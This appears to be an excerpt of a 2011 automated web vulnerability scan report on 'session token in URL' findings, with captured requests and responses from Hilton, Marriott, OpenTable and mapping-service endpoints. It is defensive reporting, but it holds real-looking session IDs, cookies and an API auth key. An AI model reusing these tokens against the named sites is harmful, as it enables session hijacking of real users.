<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
9. Session token in URL  previous  next
There are 37 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1317628825862&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1317629324879& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BAYM001206
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:56:14 GMT
Content-Length: 155

LogCredCB1317629324879({"sessionId" : "AleGSSu7but6NhatJrQIad0Z2RVOs_jfW517POazgftqzHU5BV5ZM4egl9OKoxqT", "authenticationResultCode" : "ValidCredentials"})
9.2. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://hiltonworldwide.hilton.com
Path:   /en/ww/ourbestrates/claimform.jhtml

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en/ww/ourbestrates/claimform.jhtml;jsessionid=MXIWSVWTPN352CSGBJC222Q?xch=1041820087,C16BADB2FE2A22CE7D8F31B09490D8B4.etc64& HTTP/1.1
Host: hiltonworldwide.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 25881
Date: Mon, 03 Oct 2011 13:17:21 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<link rel="stylesheet" href="/en/ww/standard.css" type="text/css">
<link rel="stylesheet" type="text/css" href="brg_style.css" />
<title>Our Best Rates. Guaranteed. Claim Form</ti
...[SNIP]...
9.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i617249&2i787967&2e1&3u13&4m2&1u716&2u251&5m3&1e0&2b1&5sen-US&token=71119 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://vacations.rooms.com/wthrooms/HotelDetails?DD=WTHROOMS&searchId=-755244140&packageIndex=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Mon, 03 Oct 2011 12:45:04 GMT
Expires: Tue, 04 Oct 2011 12:45:04 GMT
Server: staticmap
Content-Length: 81145
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 1

.PNG
.
...IHDR.............I.2.....PLTE.........(..4$.000<<<(,W$G.,S(8[4O(._,.S4.k8._D.kO$c@0oO<s_,k4GGDOOO[KD___KOwKgKOoO[wSoWK{[Kooo{{{0{.w.c.ko.w{..K..c...O..[ .w<.g$.s(.,.g[.wg..D....w..K..K
...[SNIP]...
9.4. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/marriottinternationa/mbox/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=marriott.com_%2Fdefault.mi_TopOfPage&mboxId=0&mboxTime=1317628533254&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:32 GMT; Path=/m2/marriottinternationa
Content-Type: text/javascript
Content-Length: 16822
Date: Mon, 03 Oct 2011 12:55:32 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('marriott.com_/default.mi_TopOfPage',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mb
...[SNIP]...
9.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:40 GMT; Path=/m2/marriottinternationa
Content-Length: 220
Date: Mon, 03 Oct 2011 12:55:39 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
9.6. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/opentable/mbox/standard?mboxHost=www.opentable.com&mboxSession=1317646507167-573607&mboxPage=1317646507167-573607&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=x-only&mboxCount=1&mbox=mboxInterimTrack&mboxId=0&mboxTime=1317628507182&mboxURL=http%3A%2F%2Fwww.opentable.com%2Finterim.aspx%3Frid%3D90%26restref%3D90%26m%3D4%26t%3Dsingle%26p%3D2%26d%3D10%2F3%2F2011%25207%3A00%2520PM%26rtype%3Dism_mod&mboxReferrer=http%3A%2F%2Fwww.grandcafe-sf.com%2F&mboxVersion=40 HTTP/1.1
Host: opentable.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646507167-573607.19; Domain=opentable.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:54:46 GMT; Path=/m2/opentable
Content-Type: text/javascript
Content-Length: 97
Date: Mon, 03 Oct 2011 12:54:46 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxInterimTrack',0).setOffer(new mboxOfferDefault()).loaded();
9.7. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hhonors/signup/hhonors_enroll.jhtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/hhonors/signup/hhonors_enroll.jhtml HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.hilton.com/en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; mmcore.tst=0.960; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635943626:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 143713
Date: Mon, 03 Oct 2011 12:58:54 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   
                           <title>Hilton HHonors (R) Enrollment Form</title>
               
               
...[SNIP]...
<h1>
               <a href="http://hhonors1.hilton.com/en_US/hh/home_index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ"><img id="logo" src="/en/hhonors/media/images/hilton_honors_logo.gif" title="Hilton HHonors Worldwide" alt="Hilton HHonors Worldwide" />
...[SNIP]...
<div id="customer_support"><a href="http://hhonors1.hilton.com/en_US/hh/customersupport.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="customer support">Customer Support</a>
...[SNIP]...
</span>
                                   <a href="https://secure.hilton.com/en/hhonors/help/sign_in_help.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow" title="Forgot Password">Forgot Password</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/about/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="About HHonors">About HHonors</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/points/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Points">Points</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/rewards/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Rewards">Rewards</a>
...[SNIP]...
</font>By enrolling in Hilton HHonors, I agree to the <a href="http://hhonors.hilton.com/en/hhonors/terms.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ#general">HHonors Program Terms and Conditions</a>
...[SNIP]...
</a> about you,&nbsp;our&nbsp;<a href="http://hhonors.hilton.com/en/hhonors/terms.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ#policy">expiration policy</a>
...[SNIP]...
<img src="/en/crm/media/images/hhonors/icon_padlock.jpg" />&nbsp;<a href="http://hiltonworldwide1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">privacy policy</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en/ch/home.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');" onfocus="turnOnPopup('brandBarLi_CH');" onblur="turnOffPopup('brandBarLi_CH');" title="Conrad Hotels &amp; Resorts"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');" onfocus="turnOnPopup('brandBarLi_HI');" onblur="turnOffPopup('brandBarLi_HI');" title="Hilton Hotels"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/dt/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');" onfocus="turnOnPopup('brandBarLi_DT');" onblur="turnOffPopup('brandBarLi_DT');" title="Doubletree"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/es/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');"onfocus="turnOnPopup('brandBarLi_ES');" onblur="turnOffPopup('brandBarLi_DT');" title="Embassy Suites Hotels"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/gi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');" onfocus="turnOnPopup('brandBarLi_GI');" onblur="turnOffPopup('brandBarLi_GI');" title="Hilton Garden Inn"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/hp/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');" onfocus="turnOnPopup('brandBarLi_HP');" onblur="turnOffPopup('brandBarLi_HP');" title="Hampton Hotels"><!-- <span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" href="http://hhonors1.hilton.com/en_US/hw/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');" onfocus="turnOnPopup('brandBarLi_HW');" onblur="turnOffPopup('brandBarLi_HW');" title="Homewood Suites by Hilton"><!-- <span>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Chicago/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Chicago">Chicago</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_WashingtonDC/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Washington, D.C.">Washington, D.C.</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_NewYork/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="New York">New York</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Atlanta/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Atlanta">Atlanta</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_LosAngeles/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Orlando/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Orlando">Orlando</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Dallas/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Dallas">Dallas</a></li>
           <li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Mexico/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Mexico">Mexico</a></li>
           <li><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Toronto/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Toronto">Toronto</a>
...[SNIP]...
<li class="last"><a href="http://hhonors1.hilton.com/en_US/hh/landing/Top_Dest/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Other Regions">Other Regions</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/faq.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="FAQ">FAQ</a></li>
       <li><a href="http://hhonors1.hilton.com/en_US/hh/sitemap.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/terms.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Terms and Conditions">Terms &amp; Conditions</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/partners/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Partners Terms &amp; Conditions">Partners Terms &amp; Conditions</a>
...[SNIP]...
<li><a class="linkPrivacyPolicy" href="http://hhonors1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Privacy Policy (Updated Sep 2011)" target="_blank">Privacy Policy (Updated Sep 2011)</a>
...[SNIP]...
9.8. https://secure.hilton.com/en/hi/login/login.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
9.9. https://secure.hilton.com/en/hi/login/login.jhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
<td><a href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Go to home page" tabindex="3" class="OneLinkKeepLinks"><img src="/en/hi/media/images/logos/hdr_logo.gif" alt="Hilton Hotels" border="0">
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="https://secure.hilton.com/en/hi/promotions/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="https://secure.hilton.com/en/hi/ctg/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="https://secure.hilton.com/en/hi/cart/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">My Favorite Hotels</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" href="http://www1.hilton.com/en/ch/home.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/dt/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/es/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/gi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');"></a>
...[SNIP]...
